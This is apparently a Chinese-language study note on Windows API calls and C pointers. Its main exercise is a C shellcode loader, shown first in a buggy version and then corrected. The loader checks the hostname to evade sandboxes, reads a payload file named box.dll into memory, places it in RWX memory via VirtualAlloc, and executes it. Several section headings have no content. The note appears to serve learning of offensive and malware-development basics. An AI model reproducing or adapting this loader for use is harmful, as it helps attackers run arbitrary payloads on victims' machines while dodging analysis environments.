1.Windows API
1.1 MessageBox
#include<stdio.h>
#include<Windows.h>
DWORD WINAPI ThreadProc(LPVOID IpParameter) {
MessageBox(0, 0, 0, 0);
return 0;
};
int main() {
HANDLE thread = CreateThread(0, 0, ThreadProc, 0, 0, 0);
WaitForSingleObject(thread, -1);
return 0;
}
1.2 CreateThread
1.3 CreateProcess
#include<stdio.h>
#include<Windows.h>
};
int main() {
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&(si), sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&(pi), sizeof(pi));
//创建进程
if (!CreateProcessA("C:\\Program Files(x86)\\Microsoft\\Edge\\Application\\msedge.exe", "msedge www.baidu.com", NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
{
fprintf(stderr, "CreateProcess failed\n");
return -1; }
}
1.4 VirtualAlloc
2.指针
2.1 形参与实参的传递
2.2 双重指针
2.3 读取文件到缓冲区
原始错误代码:
#include<windows.h>
#include<string.h>
#include<stdio.h>
#include<stdlib.h>
#pragma warning(disable:4996)
/*
要求1 单步调试 并处理所有的错误语法 最终程序运行结果是弹窗一个弹窗
要求2 对GetHostName函数进行改造 hostName改为二级指针的方式传递
要求3 对GetHostName函数进行改造 hostName作为返回值 传入方式为1级指针
*/
BOOL GetHostName(CHAR* hostName)
{
DWORD hostNameLen = sizeof(hostName);
if (!GetComputerNameA(hostName, &hostNameLen)) // GetComputerNameA是win32 的api 获取电脑hostname 第一个参数为存放hostname的内存缓冲区 第二个参数为缓冲区大小的地址
{
return FALSE;
}
return TRUE;
}
BOOL CheckIsSandbox()
{
CHAR hostName[MAX_PATH] = { 0 };
CHAR* sandboxName = "sandbox";
if(!GetHostName(hostName))
return FALSE;
if (!strstr(hostName, sandboxName)) /rstr 字符串比较函数 bool类型
{
printf("%s\n", "not in sandbox");
return TRUE;
}
return FALSE;
}
BOOL ReadPayload(char* shellcodeBuffer, PDWORD shellcodeSize)
{
FILE* file = { 0 };
WCHAR* buffer = NULL;
SIZE_T file_size = { 0 };
file = fopen(L"box.dll", "rb"); // 打开文件
if (file == NULL) {
perror("Error opening file");
return FALSE;
}
fseek(file, 0, SEEK_END); // 获取文件大小
file_size = ftell(file);
rewind(file);
buffer = (char*)calloc(file_size, 1);
if (buffer == NULL) {
perror("Memory allocation error");
fclose(file);
return FALSE;
}
fread(buffer, sizeof(char), file_size, file); // 将读取文件内容到内存拷贝到我们申请的内存中
*shellcodeBuffer = &buffer;
*shellcodeSize = &file_size;
fclose(file);// 关闭文件
return TRUE;
}
BOOL ExecShellcode(char* shellcode, DWORD shellcodeSize)
{
PVOID* shellcodeBuffer = NULL;
if (shellcodeSize == 0)
{
printf("Invalid shellCode length\n");
return FALSE;
}
shellcodeBuffer = calloc(shellcodeSize, 1);
memcpy(shellcodeBuffer, shellcode, shellcodeSize);
((void(*)())shellcodeBuffer)();
return TRUE;
}
int main()
{
if (!CheckIsSandbox())
{
return 1;
}
else
{
CHAR* shellcodeBuffer = NULL;
DWORD shellcodeSize = 0;
if(!ReadPayload(shellcodeBuffer, &shellcodeSize))
return 1;
ExecShellcode(shellcodeBuffer, shellcodeSize);
}
return 0;
}
根据本次学习修稿后:
#include<windows.h>
#include<string.h>
#include<stdio.h>
#include<stdlib.h>
#pragma warning(disable:4996)
/*
要求1 单步调试 并处理所有的错误语法 最终程序运行结果是弹窗一个弹窗
要求2 对GetHostName函数进行改造 hostName改为二级指针的方式传递
要求3 对GetHostName函数进行改造 hostName作为返回值 传入方式为1级指针
*/
BOOL GetHostName(CHAR* hostName)
{
DWORD hostNameLen = sizeof(hostName);
if (!GetComputerNameA(hostName, &hostNameLen)) // GetComputerNameA是win32 的api 获取电脑hostname 第一个参数为存放hostname的内存缓冲区 第二个参数为缓冲区大小的地址
{
return FALSE;
}
return TRUE;
}
BOOL CheckIsSandbox()
{
CHAR hostName[MAX_PATH] = { 0 };
CHAR* sandboxName = "sandbox";
if(!GetHostName(hostName))
return FALSE;
if (!strstr(hostName, sandboxName)) //strstr 字符串比较函数 bool类型
{
printf("%s\n", "not in sandbox");
return TRUE;
}
return FALSE;
}
BOOL ReadPayload(char** shellcodeBuffer, DWORD* shellcodeSize)
{
FILE* file = { 0 };
CHAR* buffer = NULL;
SIZE_T file_size = { 0 };
file = fopen("box.dll", "rb"); // 打开文件
if (file == NULL) {
perror("Error opening file");
return FALSE;
}
fseek(file, 0, SEEK_END); // 获取文件大小
file_size = ftell(file);
rewind(file);
buffer = (char*)calloc(file_size, 1);
if (buffer == NULL) {
perror("Memory allocation error");
fclose(file);
return FALSE;
}
fread(buffer, sizeof(char), file_size, file); // 将读取文件内容到内存拷贝到我们申请的内存中
*shellcodeBuffer = buffer;
*shellcodeSize = (DWORD)file_size;
fclose(file);// 关闭文件
return TRUE;
}
BOOL ExecShellcode(char* shellcode, DWORD shellcodeSize)
{
PVOID* shellcodeBuffer = NULL;
if (shellcodeSize == 0)
{
printf("Invalid shellCode length\n");
return FALSE;
}
shellcodeBuffer = VirtualAlloc(NULL,shellcodeSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
memcpy(shellcodeBuffer, shellcode, shellcodeSize);
((void(*)())shellcodeBuffer)();
return TRUE;
}
int main()
{
{
CHAR* shellcodeBuffer = NULL;
DWORD shellcodeSize = 0;
if(!ReadPayload(&shellcodeBuffer, &shellcodeSize))
return 1;
ExecShellcode(shellcodeBuffer, shellcodeSize);
}
return 0;
}